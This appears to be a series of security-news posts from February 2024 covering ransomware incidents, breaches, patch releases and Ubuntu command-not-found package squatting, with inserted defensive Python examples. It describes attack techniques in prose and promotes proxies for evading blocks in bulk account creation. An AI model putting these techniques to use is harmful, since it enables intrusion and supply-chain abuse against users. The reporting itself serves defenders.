The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors. The victims of the group are “targets of opportunity.”

In December 2023, FBI and CISA published a joint Cybersecurity Advisory (CSA) to warn of Rhysida ransomware attacks. The advisory is part of the ongoing #StopRansomware effort, disseminating information about tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with ransomware groups.

The report includes IOCs and TTPs identified through investigations as recently as September 2023.

Rhysida actors leverage external-facing remote services (e.g. VPN and RDP) to gain initial access to the target network and maintain persistence. The group relied on compromised credentials to authenticate to internal VPN access points. According to the advisory, the threat actors have exploited Zerologon (CVE-2020-1472) in Microsoft’s Netlogon Remote Protocol in phishing attempts.

The group relies on living off-the-land techniques such as native (built into the operating system) network administration tools to perform malicious operations.

Pierluigi Paganini

(SecurityAffairs – Hacking, ransomware)

Residential Proxies vs. Datacenter Proxies: Choosing the Right Option

12 February 2024 at 18:58

Residential Proxies vs. Datacenter Proxies: this blog post examines the contours of each type and provides info on how to choose the perfect proxy option

In the robust landscape of the digital era, our need for privacy, security, and accessibility on the internet has never been more acute. Whether it’s for gathering market intelligence, ensuring your privacy, or bypassing geographical restrictions, proxies have become the unsung heroes for individuals and enterprises alike. But when it’s time to pick the right proxy for your needs, you might find yourself at a crossroads between residential and datacenter proxies. Let’s embark on a journey to discover the contours of each type and traverse the path to choosing the perfect proxy option for you.

Proxies serve as intermediaries between you and the internet, a kind of digital masquerade that conceals your IP address, lending you another. Imagine walking into a virtual masquerade ball; the mask you choose, whether the suave residential or the discreet datacenter, determines how you interact with other guests (websites) and how hosts (servers) perceive you.

Understanding the Difference Between Residential and Datacenter Proxies

At the heart of this decision is understanding the two main contestants: residential proxies and datacenter proxies.

Residential Proxies: The Noble Disguise

Residential proxies are like the knights in shining armour of the proxy world; they come with legitimate, ISP-issued IP addresses that trace back to an actual device in a real location. These proxies give you the appearance of a genuine user, blending in with the crowd seamlessly. They’re exceptionally useful for tasks that require a high level of legitimacy and are less likely to be blocked or banned, making them ideal for sensitive operations like web scraping, ad verification, and accessing geo-restricted content.

Imagine you’re doing market research and you need access to local pricing across different regions. Residential proxies ensure that your requests are seen as coming from a resident of the target location. In this guise, websites are much more hospitable, allowing you uninhibited access to the data that is usually hidden from outsiders.

Datacenter Proxies: The Efficient Masquerade

In contrast, datacenter proxies are the mavericks of the proxy world. They’re not affiliated with any ISP and don’t correspond to a particular residential address. Instead, they’re housed in data centres around the globe, providing you with a non-residential IP address. Their strength lies in speed and cost-effectiveness, making them perfect for tasks that require swift execution, like brand protection or bulk account creation.

Due to their nature, datacenter proxies can raise red flags for some websites, leading to a higher chance of being blocked if used recklessly. However, with proper rotation and usage, they can offer a speedy solution for your internet endeavours without the higher price tag of their residential counterparts.

So, how do you choose between the knight and the maverick? It really boils down to your specific needs.

The Case for Residential Proxies

Residential proxies are your go-to for high-stakes tasks that necessitate undisputed legitimacy. If you’re managing social media accounts for influencer marketing or performing competitor analysis, residential proxies provide the reliability you need. They’re less likely to get blocked or blacklisted, offering you a sustainable solution for long-term operations.

Consider a brand that needs to ensure its advertisements are appearing properly across different regions. Residential proxies can facilitate the process by enabling the brand to see what their ads look like from various locations around the globe.

The Argument for Datacenter Proxies

But what if your task is more about straightforward functionality than cloak-and-dagger finesse? Datacenter proxies have you covered. With their swift connectivity and lower costs, they gleam with the allure of efficiency. They’re particularly well-suited for situations where you need a large number of IPs at your disposal or when you’re executing tasks that are less sensitive to the authenticity of your IP address.

Imagine a scenario where you’re validating the integrity of your website by performing numerous stress tests. In this case, datacenter proxies provide the anonymity and variation required without the added cost of residential IPs.

The beauty lies in the balance. Some prefer the chivalrous assurance of residential proxies, while others opt for the cost-effective agility of datacenter proxies. Also, it’s worth noting that advancements in technology have introduced rotating proxies—a service like GoProxies promises to offer the best of both worlds. It combines the stealth of residential proxies with the efficiency of datacenter proxies, as IPs rotate, reducing the risk of detection and banning.

Choosing the Right Option

Choosing between residential and datacenter proxies is no light matter and it prompts introspection into the nature of your online activities. Assess your needs, from the level of scrutiny you can withstand to the speed you require. Are you someone who needs to manoeuvre through cyberspace undetected for data scraping, or do you need the power of numbers for simpler automated tasks?

Regardless of your choice, ensure that you select a reliable proxy provider that can give you the assurance of quality and the support you need. Explore the options, ask questions, and even test out the services to find the perfect match. Your digital adventures hinge on this critical choice between residential and datacenter proxies.

In the end, no matter which mask you don, remember that your online quests deserve the most fitting digital façade. Whether it’s the robust authenticity of a residential proxy or the swift anonymity of a datacenter proxy, choose a sidekick that complements your online strategy and propels you towards your goals.

In this ever-evolving affair of digital disguises and internet sleuthing, the right proxy could mean the difference between success and setback. So choose wisely, and let this subtle but crucial cog in your internet mechanism set the stage for a safer, smarter, and more efficient online presence.

About Author: Anas Baig

With a passion for working on disruptive products, Anas Baig is currently working as a Product Manager at the Silicon Valley based company Securiti.ai. He holds a degree in Computer Science from Iqra University and specializes in Information Security & Data Privacy.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Public Wi-Fi)

Global Malicious Activity Targeting Elections is Skyrocketing

13 February 2024 at 09:38

Resecurity has identified a growing trend of malicious cyber-activity targeting sovereign elections globally

With more voters than ever in history heading to the polls in 2024, Resecurity has identified a growing trend of malicious cyber-activity targeting sovereign elections globally. In an era of unprecedented geopolitical volatility, this trend is particularly concerning, as Time Magazine notes that 64 countries (plus the European Union) are set to hold national elections this year. According to Time Magazine, “2024 is not just an election year. It’s perhaps the election year.”

Collectively, some two billion eligible voters represented in these races constitute roughly 49% of the global population. For many of these voters, the results of these elections “will prove consequential for years to come,” according to Time Magazine. By far, the most significant contest this year is the U.S. presidential election, the outcome of which could radically alter the destinies of geopolitical relations and military conflicts globally.

Besides the continued targeting of the U.S. and its allies, activity observed by Resecurity between 2023 and early 2024 indicates a 100 percent increase from the previous analysis period. This assessment is based on multiple incidents that Resecurity observed and reported to the relevant authorities in the following regions and countries: Africa, the European Union, the United Kingdom, Ecuador, Bangladesh, Indonesia, Israel, Iraq, Turkey, and Mexico.

These types of incidents generally act as precursors for more significant malicious activity that can be further amplified by foreign interference campaigns. Besides cyberespionage, threat actors aim to sow uncertainty about the integrity of elections via operations that aim to disrupt and manipulate public opinion globally. Unfortunately, these incidents remain complicated from an investigation perspective and are often imperceptible to the public.

With the 2024 General Election rapidly approaching in the U.S., the intelligence collected about the incidents discussed in this report serves as a stark reminder that threat actors are actively trying to acquire and exploit voter data. While some of the threat actors behind these leak operations are motivated purely by profit or by opportunistic, ideologically driven hacktivism, other cogs in this cybercriminal supply chain may be looking to weaponize voter data to craft targeted propaganda campaigns and subvert democracies worldwide.

Similar to the phenomenon of account compromise due to password reuse across multiple platforms, leaked voter data remains exploitable years after the initial leak.

Elections

This is one of the most crucial issues that governments should address. In the backdrop of rapidly increasing cyber-threats, ensuring comprehensive identity protection for voters has become foundational to preserving the integrity of the democratic process. Cyberespionage groups, operating under the direction of nation-state actors, are targeting voter PII, plotting to use it as a long-term weapon for electoral interference. This data reveals crucial demographic insights and context about target populations during both pre-election and post-election stages.

A detailed technical analysis of the activities targeting elections is available here:

https://www.resecurity.com/blog/article/global-malicious-activity-targeting-elections-is-skyrocketing


Pierluigi Paganini

(SecurityAffairs – Hacking, elections)

Ransomfeed – Third Quarter Report 2023 is out!

13 February 2024 at 11:47

Maintainers behind the Ransomfeed platform have released Q3 Report 2023 including activities of 185 criminal groups operating worldwide.

A comprehensive report on the ransomware threat landscape during the final four months of 2023 (the period Ransomfeed labels as its third quarter) is out, focused on the monitoring activity of the OSINT Ransomfeed platform (www.ransomfeed.it). Throughout this period, the platform tracked 185 criminal groups operating worldwide and traced 342 servers employed for ransomware activities. The data collected revealed a total of 1,771 ransomware claims, 55 of which concerned Italy. The report examines the geographical distribution of these attacks as well as the industries predominantly targeted.

As usual, the data were collected through the Ransomfeed platform’s primary activity: periodic scraping of well-known dark web leak sites. This report focuses on the results for the third quarter of last year, starting with a global overview of all monitored ransomware groups and ending with a specific focus on Italy.

During this period of 2023, the platform monitored 185 cybercriminal groups operating ransomware across 342 servers and mirrors, and recorded 1,771 ransomware claims worldwide.

ransomware Ransomfeed Q3 2023

Each of the four months, September through December, brought its own challenges. December was the most prolific month with 484 attacks, closely followed by November with 482, September with 458 and October with 347, which together account for the 1,771 claims. The year’s end saw an escalation in criminal claims, almost as if the groups were closing out a productive year. The full report breaks these figures down further by day.

This report offers an exhaustive account of ransomware threats in the third quarter of 2023, spotlighting activities monitored by the OSINT Ransomfeed platform.

In conclusion, the report underscores the paramount importance of international collaboration and the adoption of advanced defense strategies to effectively counter the burgeoning phenomenon of ransomware threats and safeguard the integrity of data and information systems.

Ransomfeed trusts that this report, the product of a non-profit effort, will serve as a vital resource for cybersecurity professionals, researchers, and stakeholders alike, providing valuable insights into the evolving ransomware landscape and paving the way for robust defense mechanisms against such malicious activities.

The complete report is available here:

https://ransomfeed.it/data/reports/2023/DRM-Report-Q3-2023-%5BENG%5D.pdf


Pierluigi Paganini

(SecurityAffairs – Hacking, ransomware)

Bank of America customer data compromised after a third-party services provider data breach

13 February 2024 at 18:47

Bank of America revealed that the personal information of some customers was stolen in a data breach affecting a third-party services provider.

Bank of America began notifying some customers following a data breach at the third-party services provider Infosys McCamish Systems (IMS). The bank sent notification letters to roughly 57,000 customers, informing them that their personal information had been compromised.

Infosys disclosed the security breach on November 3, 2023; in a filing with the SEC, the company reported it was the victim of a cyberattack that resulted in the non-availability of certain applications and systems.

McCamish immediately launched an investigation into the incident and worked on the remediation with the help of cybersecurity consultants.

The effects of the cyberattack described by the victim suggest it was targeted by a ransomware attack. On November 4, the LockBit ransomware gang claimed responsibility for the attack.

The company restored the impacted systems by December 31; it also estimated that the losses caused by the incident will be at least $30 million.

“On the basis of analysis conducted by the cybersecurity firm, McCamish believes that certain data was exfiltrated by unauthorized third parties during the incident and this exfiltrated data included certain customer data. McCamish has engaged a third-party e-discovery vendor in assessing the extent and nature of such data. This review process is ongoing. McCamish may incur additional costs including indemnities or damages/claims, which are indeterminable at this time.” reads the statement sent to the SEC. “Infosys had previously communicated the occurrence of this cybersecurity incident to BSE Limited, National Stock Exchange of India Limited, New York Stock Exchange and to United States Securities and Exchange Commission on November 3, 2023.”

On February 1, Bank of America started notifying 57,028 customers impacted by the data breach.

In a filing with the Maine Attorney General’s Office, Bank of America noted that it cannot determine “with certainty what personal information was accessed” during the attack.

“On or around November 3, 2023, IMS was impacted by a cybersecurity event when an unauthorized third party accessed IMS systems, resulting in the non-availability of certain IMS applications. On November 24, 2023, IMS told Bank of America that data concerning deferred compensation plans serviced by Bank of America may have been compromised. Bank of America’s systems were not compromised.” reads the letter sent to the impacted customers. “It is unlikely that we will be able to determine with certainty what personal information was accessed as a result of this incident at IMS. According to our records, deferred compensation plan information may have included your first and last name, address, business email address, date of birth, Social Security number, and other account information.”

According to the financial institution, exposed data may include first and last name, address, business email address, date of birth, Social Security number, and other account information.

Bank of America states that it is not aware of any misuse of the compromised information; nevertheless, the bank will provide a complimentary two-year membership in the Experian IdentityWorks identity theft protection service.


Pierluigi Paganini

(SecurityAffairs – Hacking, Bank of America) 

A ransomware attack took 100 Romanian hospitals down

13 February 2024 at 21:59

Authorities in Romania reported that at least 100 hospitals went offline after a ransomware attack hit the Hipocrate platform.

Authorities in Romania confirmed that a ransomware attack that targeted the Hipocrate Information System (HIS) has disrupted operations for at least 100 hospitals.

Hipocrate Information System (HIS) is a software suite designed to manage the medical and administrative activities of hospitals and other healthcare institutions.

The attack took place on February 11 and encrypted data in the production servers.

“During the night of February 11 to 12, 2024, a massive cyber ransomware attack took place on the production servers on which the HIS IT system runs. As a result of the attack, the system is down, files and databases are encrypted.” reported the Romanian Ministry of Health.

The initial number of impacted hospitals was 21, but later the authorities confirmed that the number had increased to 25. Another 79 hospitals took their systems down as a precautionary measure.

The Romanian Ministry of Health added that cybersecurity specialists, including experts from the National Cyber Security Directorate (DNSC), are monitoring the situation. The Romanian government also announced extraordinary preventive measures to prevent other hospitals from being impacted by the incident.

DNSC reported that the ransomware operators employed a variant of the Phobos ransomware family known as Backmydata. The threat actors demand a payment of 3.5 BTC (about EUR 157,000).

“Hospitals using the HIPOCRATE platform, regardless of whether they were affected or not, have since yesterday received a series of recommendations from the DNSC to properly manage the situation” reported DNSC.

  • Identify affected systems and immediately isolate them from the rest of the network as well as from the Internet
  • Keep a copy of the ransom message and any other communications from the attackers. This information is useful to the authorities or for further analysis of the attack
  • Do not shut down the affected equipment. Stopping it will remove the evidence stored in the volatile memory (RAM)
  • Collect and keep all relevant log information, from the affected equipment but also from network equipment and firewalls
  • Examine the system logs to identify the mechanism by which IT infrastructure has been compromised
  • Immediately inform all employees and notify affected customers and business partners of the incident and its extent
  • Restore affected systems from data backups after a full system cleanup has been performed. It is absolutely necessary to ensure that backups are intact, up-to-date and secure against attack
  • Ensure that all programs, applications and operating systems are updated to the latest versions and that all known vulnerabilities are patched
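The last-but-one recommendation, making sure backups are intact before restoring from them, is the one step in the list that can be mechanised. The following is an added illustration and not tooling from DNSC or the Hipocrate vendor: a SHA-256 manifest is computed when the backup is written and kept off the backup medium, and a verifier run before restore lists every file that was altered (for example encrypted in place), removed or added since. The directory layout, file names and contents are constructed for the demonstration.

```python
"""Backup integrity check before restoring after a ransomware incident.

Added example (not DNSC's or the Hipocrate vendor's own tooling). A hash
manifest is taken when the backup is made and stored somewhere the attacker
cannot reach; verify_backup() compares the backup on disk against it.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large database dumps fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(backup_root: Path) -> dict:
    """Map every file under backup_root (relative POSIX path) to its SHA-256."""
    return {
        p.relative_to(backup_root).as_posix(): sha256_file(p)
        for p in sorted(backup_root.rglob("*"))
        if p.is_file()
    }


def verify_backup(backup_root: Path, trusted_manifest: dict) -> dict:
    """Compare the backup with a manifest kept OFF the backup medium.

    Trusting a manifest stored next to the backup is pointless: an operator
    who can encrypt the files can rewrite that manifest too.
    """
    current = build_manifest(backup_root)
    modified = sorted(f for f in trusted_manifest
                      if f in current and current[f] != trusted_manifest[f])
    missing = sorted(f for f in trusted_manifest if f not in current)
    added = sorted(f for f in current if f not in trusted_manifest)
    return {
        "ok": not (modified or missing or added),
        "modified": modified,   # contents changed: likely encrypted in place
        "missing": missing,     # gone or renamed (e.g. a new extension)
        "added": added,         # ransom notes, renamed ciphertext, ...
    }


def demo() -> dict:
    """Constructed scenario: a backup is taken, then tampered with in place."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "his-backup"            # hypothetical backup location
        (root / "db").mkdir(parents=True)
        (root / "db" / "patients.sql").write_bytes(b"CREATE TABLE patients (...);\n")
        (root / "config.ini").write_bytes(b"[his]\nmode=production\n")

        trusted = build_manifest(root)              # taken at backup time, stored offline

        # Simulate the effects of the attack described above: contents
        # replaced with ciphertext, a file renamed, a ransom note dropped.
        (root / "db" / "patients.sql").write_bytes(b"\x00garbage ciphertext\x00")
        (root / "config.ini").rename(root / "config.ini.locked")
        (root / "info.txt").write_text("your files are encrypted\n")

        return verify_backup(root, trusted)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

A restore job should refuse to proceed unless the verdict is "ok"; a non-empty "modified" or "added" list on a backup that was supposedly untouched is itself an indicator that the backup host was reachable from the compromised network.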

At this time, it is still unclear if the threat actors have stolen sensitive data from the impacted organizations.


Pierluigi Paganini

(SecurityAffairs – ransomware, Romanian hospitals) 

Microsoft Patch Tuesday for February 2024 fixed 2 actively exploited 0-days

14 February 2024 at 08:38

Microsoft Patch Tuesday security updates for February 2024 addressed 72 flaws, two of which are actively exploited in the wild.

Microsoft Patch Tuesday security updates for February 2024 resolved a total of 72 vulnerabilities, including two actively exploited zero-days.

The vulnerabilities affect Microsoft Windows and Windows Components; Office and Office Components; Azure; .NET Framework and ASP.NET; SQL Server; Windows Hyper-V; and Microsoft Dynamics.

Five vulnerabilities are rated Critical, 65 are rated Important, and two are rated Moderate in severity.

The two flaws actively exploited are:

CVE-2024-21412 (CVSS score 8.1) – Internet Shortcut Files Security Feature Bypass Vulnerability. An unauthenticated attacker can trigger the flaw by sending the victim a specially crafted file that is designed to bypass displayed security checks. The attacker has to trick the victims into clicking the file link. The flaw was reported by:

CVE-2024-21351 (CVSS score 7.6) – Windows SmartScreen Security Feature Bypass Vulnerability. An authorized attacker can trigger the flaw to bypass the SmartScreen user experience. The attacker can exploit the vulnerability by sending a malicious file to the user and convincing them to open it.

Below is the list of the critical flaws fixed by Microsoft Patch Tuesday security updates for February 2024.

Patch Tuesday February 2024

As usual the ZDI has published the full list of CVEs released by Microsoft for February 2024 here:

https://www.zerodayinitiative.com/blog/2024/2/13/the-february-2024-security-update-review


Pierluigi Paganini

(SecurityAffairs – ransomware, Patch Tuesday) 

Adobe Patch Tuesday fixed critical vulnerabilities in Magento, Acrobat and Reader

14 February 2024 at 09:25

Adobe Patch Tuesday security updates for February 2024 addressed more than 30 vulnerabilities in multiple products, including critical issues.

The security updates Adobe released for February 2024 Patch Tuesday addressed over 30 vulnerabilities across various products, including critical issues.

The software maker warned of critical flaws in popular products such as Adobe Acrobat and Reader, Adobe Commerce and Magento Open Source, Substance 3D Painter, and FrameMaker.

The company fixed 13 vulnerabilities in the Adobe Acrobat and Reader software, including arbitrary code execution, application denial of service and memory leak vulnerabilities.

“Adobe has released a security update for Adobe Acrobat and Reader for Windows and macOS. This update addresses critical and important vulnerabilities.” reads the advisory. “Successful exploitation could lead to arbitrary code execution, application denial-of-service, and memory leak.”

Below is the list of vulnerabilities addressed by the software vendor:

Vulnerability Category | Vulnerability Impact | Severity | CVSS base score | CVSS vector | CVE Number
Out-of-bounds Write (CWE-787) | Arbitrary code execution | Critical | 7.8 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CVE-2024-20726
Out-of-bounds Write (CWE-787) | Arbitrary code execution | Critical | 7.8 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CVE-2024-20727
Out-of-bounds Write (CWE-787) | Arbitrary code execution | Critical | 7.8 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CVE-2024-20728
Use After Free (CWE-416) | Arbitrary code execution | Important | 7.8 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CVE-2024-20729
Integer Overflow or Wraparound (CWE-190) | Arbitrary code execution | Critical | 7.8 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CVE-2024-20730
Use After Free (CWE-416) | Arbitrary code execution | Critical | 8.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CVE-2024-20731
Improper Input Validation (CWE-20) | Application denial-of-service | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H | CVE-2024-20733
Use After Free (CWE-416) | Memory leak | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N | CVE-2024-20734
Out-of-bounds Read (CWE-125) | Memory leak | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N | CVE-2024-20735
Out-of-bounds Read (CWE-125) | Memory leak | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N | CVE-2024-20736
Out-of-bounds Read (CWE-125) | Memory leak | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N | CVE-2024-20747
Out-of-bounds Read (CWE-125) | Memory leak | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N | CVE-2024-20748
Out-of-bounds Read (CWE-125) | Memory leak | Important | 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N | CVE-2024-20749

Below is the list of vulnerabilities addressed by the software firm that impact Adobe Commerce and Magento Open Source products:

Vulnerability Category | Vulnerability Impact | Severity | Authentication required to exploit? | Exploit requires admin privileges? | CVSS base score | CVSS vector | CVE number(s)
Cross-site Scripting (Stored XSS) (CWE-79) | Arbitrary code execution | Critical | Yes | Yes | 9.1 | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H | CVE-2024-20719
Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) (CWE-78) | Arbitrary code execution | Critical | Yes | Yes | 9.1 | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H | CVE-2024-20720
Uncontrolled Resource Consumption (CWE-400) | Application denial-of-service | Important | Yes | Yes | 5.7 | CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:N/I:N/A:H | CVE-2024-20716
Cross-site Scripting (Stored XSS) (CWE-79) | Arbitrary code execution | Important | Yes | Yes | 5.4 | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N | CVE-2024-20717
Cross-Site Request Forgery (CSRF) (CWE-352) | Security feature bypass | Moderate | Yes | No | 4.3 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N | CVE-2024-20718

According to the advisory, the above vulnerabilities can be exploited only by an authenticated attacker.

“Exploit requires admin privileges: The vulnerability is (or is not) only exploitable by an attacker with administrative privileges.” states the advisory.

The good news is that the software vendor is not aware of attacks in the wild exploiting these vulnerabilities.


Pierluigi Paganini

(SecurityAffairs – ransomware, Patch Tuesday) 

Zoom fixed critical flaw CVE-2024-24691 in Windows software

14 February 2024 at 15:33

Zoom addressed seven vulnerabilities in its desktop and mobile applications, including a critical flaw (CVE-2024-24691) affecting the Windows software.

The video conferencing giant Zoom released security updates to address seven vulnerabilities in its desktop and mobile applications, including a critical issue, tracked as CVE-2024-24691 (CVSS score of 9.6), in its Windows software.

The vulnerability CVE-2024-24691 is an improper input validation bug that could be exploited by an attacker with network access to escalate privileges.

“Improper input validation in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows may allow an unauthenticated user to conduct an escalation of privilege via network access.” reads the advisory.

The vulnerability impacts the following products:

  • Zoom Desktop Client for Windows before version 5.16.5
  • Zoom VDI Client for Windows before version 5.16.10 (excluding 5.14.14 and 5.15.12)
  • Zoom Rooms Client for Windows before version 5.17.0
  • Zoom Meeting SDK for Windows before version 5.16.5

The company also addressed a high-severity escalation of privilege vulnerability, tracked as CVE-2024-24697, impacting Windows software.

“Untrusted search path in some Zoom 32 bit Windows clients may allow an authenticated user to conduct an escalation of privilege via local access.” reads the advisory.

The issue impacts the following products:

  • Zoom Desktop Client for Windows before version 5.17.0
  • Zoom VDI Client for Windows before version 5.17.5 (excluding 5.15.15 and 5.16.12)
  • Zoom Meeting SDK for Windows before version 5.17.0
  • Zoom Rooms Client for Windows before version 5.17.0
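As an added example that is not Zoom’s own tooling, the check below encodes the fixed-version thresholds and the excluded maintenance releases printed above for CVE-2024-24691 and CVE-2024-24697 and reports which of the two a given installed build is still exposed to. The product keys ("desktop", "vdi", "rooms", "sdk") are labels chosen here; versions are compared as integer tuples because a plain string comparison would rank 5.16.10 below 5.16.5.

```python
"""Affected-version check for the Zoom Windows advisories on this page.

Added example (not Zoom's tooling). Thresholds and exclusions are the ones
printed above; the product keys are hypothetical labels.
"""


def parse_version(v: str) -> tuple:
    """'5.16.10' -> (5, 16, 10). Tuples compare numerically per component."""
    return tuple(int(part) for part in v.strip().split("."))


# CVE -> product -> (first fixed version, builds that carry a back-ported fix)
AFFECTED = {
    "CVE-2024-24691": {
        "desktop": ("5.16.5", ()),
        "vdi": ("5.16.10", ("5.14.14", "5.15.12")),
        "rooms": ("5.17.0", ()),
        "sdk": ("5.16.5", ()),
    },
    "CVE-2024-24697": {
        "desktop": ("5.17.0", ()),
        "vdi": ("5.17.5", ("5.15.15", "5.16.12")),
        "sdk": ("5.17.0", ()),
        "rooms": ("5.17.0", ()),
    },
}


def is_affected(cve: str, product: str, installed: str) -> bool:
    """True when `installed` predates the fix and is not an excluded build."""
    fixed_in, excluded = AFFECTED[cve][product]
    v = parse_version(installed)
    if v in {parse_version(e) for e in excluded}:
        return False            # fix back-ported to this maintenance release
    return v < parse_version(fixed_in)


def affected_cves(product: str, installed: str) -> list:
    """All CVEs from the table above that still apply to this build."""
    return sorted(cve for cve, products in AFFECTED.items()
                  if product in products and is_affected(cve, product, installed))


if __name__ == "__main__":
    for product, version in (("desktop", "5.16.5"), ("vdi", "5.15.12"), ("vdi", "5.14.15")):
        print(product, version, affected_cves(product, version))
```

Note that the exclusions are individual back-ported builds, not ranges: a VDI client at 5.14.15 sits between two excluded releases and is still reported as affected, which is the correct reading of the advisory text.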

Below is the complete list of the addressed issues:

ZSB | Title | Severity | CVE | Date Published | Date Updated
ZSB-24008 | Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows – Improper Input Validation | Critical | CVE-2024-24691 | 02/13/2024 | 02/13/2024
ZSB-24007 | Zoom Clients – Improper Input Validation | Medium | CVE-2024-24690 | 02/13/2024 | 02/13/2024
ZSB-24006 | Zoom Clients – Business Logic Error | Medium | CVE-2024-24699 | 02/13/2024 | 02/13/2024
ZSB-24005 | Zoom Clients – Improper Authentication | Medium | CVE-2024-24698 | 02/13/2024 | 02/13/2024
ZSB-24004 | Zoom Clients – Untrusted Search Path | High | CVE-2024-24697 | 02/13/2024 | 02/13/2024
ZSB-24003 | Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows – Improper Input Validation | Medium | CVE-2024-24696 | 02/13/2024 | 02/13/2024
ZSB-24002 | Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows – Improper Input Validation | Medium | CVE-2024-24695 | 02/13/2024 | 02/13/2024

It is unclear whether any of the above vulnerabilities has been actively exploited in the wild.

Zoom recommends its users to update their applications to the latest available releases as soon as possible.

In November 2023, the company fixed a critical vulnerability in Zoom Rooms that allowed threat actors to take over meetings and steal sensitive data.


Pierluigi Paganini

(SecurityAffairs – hacking, Zoom)

Abusing the Ubuntu ‘command-not-found’ utility to install malicious packages

14 February 2024 at 21:48

Researchers reported that attackers can exploit the ‘command-not-found’ utility to trick users into installing rogue packages on Ubuntu systems.

Cybersecurity researchers from cloud security firm Aqua discovered that the popular ‘command-not-found’ utility can be abused to steer users toward malicious packages.

“Aqua Nautilus researchers have identified a security issue that arises from the interaction between Ubuntu’s command-not-found package and the snap package repository.” reads the report published by Aqua. “While command-not-found serves as a convenient tool for suggesting installations for uninstalled commands, it can be inadvertently manipulated by attackers through the snap repository, leading to deceptive recommendations of malicious packages.”

The default installation of Ubuntu includes the command-not-found package, it provides suggestions for package installations when users attempt to execute a command in Bash or Zsh that is not available on their system. The command relies on the implementation of the command_not_found_handle function, which Bash invokes when encountering an unrecognized command.

The package provides recommendations for both APT and snap packages. For example, if a user tries to execute “ifconfig” and it’s not installed, the package will suggest installing “net-tools” through apt.

The utility uses a local database located at /var/lib/command-not-found/commands.db to link commands to their corresponding APT packages.

An attacker can register the snap name corresponding to an APT package whose maintainers have not yet claimed it, and then upload a rogue package under that name.

“The maintainers of the jupyter-notebook APT package had not claimed the corresponding snap name. This oversight left a window of opportunity for an attacker to claim it and upload a malicious snap named jupyter-notebook.” reads the analysis published by Aqua. “We can observe that the command-not-found utility suggests the snap package first, even before the original APT package. This behavior could potentially mislead users into installing the snap package.”

command-not-found package attack

Moreover, the researchers found that up to 26% of the commands linked to APT (Advanced Package Tool) packages may be exposed to impersonation. This weakness could expose users to supply chain attacks affecting both Linux systems and Windows systems running WSL.

The researchers also warn of typosquatting attacks, in which users who mistype a command (e.g., ifconfigg instead of ifconfig) are offered malicious snap packages that attackers have registered under the misspelled name.

“For instance, consider what could occur if a user accidentally types ifconfigg instead of ifconfig” continues the analysis. “the command-not-found package helpfully corrects the user, suggesting the net-tools package for the mistyped ifconfig command. However, the situation becomes more problematic when an attacker capitalizes on these common mistakes by registering a snap with the typo, such as ifconfigg.”

The potential for attackers to exploit the command-not-found utility by suggesting their rogue Snap packages is worrisome.

“It remains uncertain how extensively these capabilities have been exploited, underscoring the urgency for heightened vigilance and proactive defense strategies,” Aqua concludes.
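To make the two abuse paths concrete, the audit below is an added example and not Aqua’s tooling. It replaces the real lookups with a constructed command-to-APT-package map (standing in for what commands.db would answer) and a constructed snap registry with hypothetical publisher names, then reports APT package names that are unclaimed or claimed by an untrusted publisher as snaps, and typed commands one keystroke away from a real command that resolve to an untrusted snap.

```python
"""Audit of what command-not-found may suggest, modelling the two abuse paths
described above: a snap name claimed for an APT package the maintainers never
registered, and a snap registered under a typo of a real command.

Added example; not Aqua's tooling. APT_COMMANDS stands in for the answers
/var/lib/command-not-found/commands.db would give and SNAP_REGISTRY for the
Snap Store; both are constructed and the publisher names are hypothetical.
"""

# Constructed: command -> APT package that provides it
APT_COMMANDS = {
    "ifconfig": "net-tools",
    "jupyter-notebook": "jupyter-notebook",
    "git": "git",
    "htop": "htop",
}

# Constructed: snap name -> publisher account
SNAP_REGISTRY = {
    "git": "canonical",             # same name, trusted publisher
    "jupyter-notebook": "mallory",  # same name as the APT package, unrelated account
    "ifconfigg": "mallory",         # one keystroke away from ifconfig
}

TRUSTED_PUBLISHERS = {"canonical"}  # hypothetical allow-list


def edit_distance_le_1(a: str, b: str) -> bool:
    """True when a and b differ by at most one insertion, deletion or substitution."""
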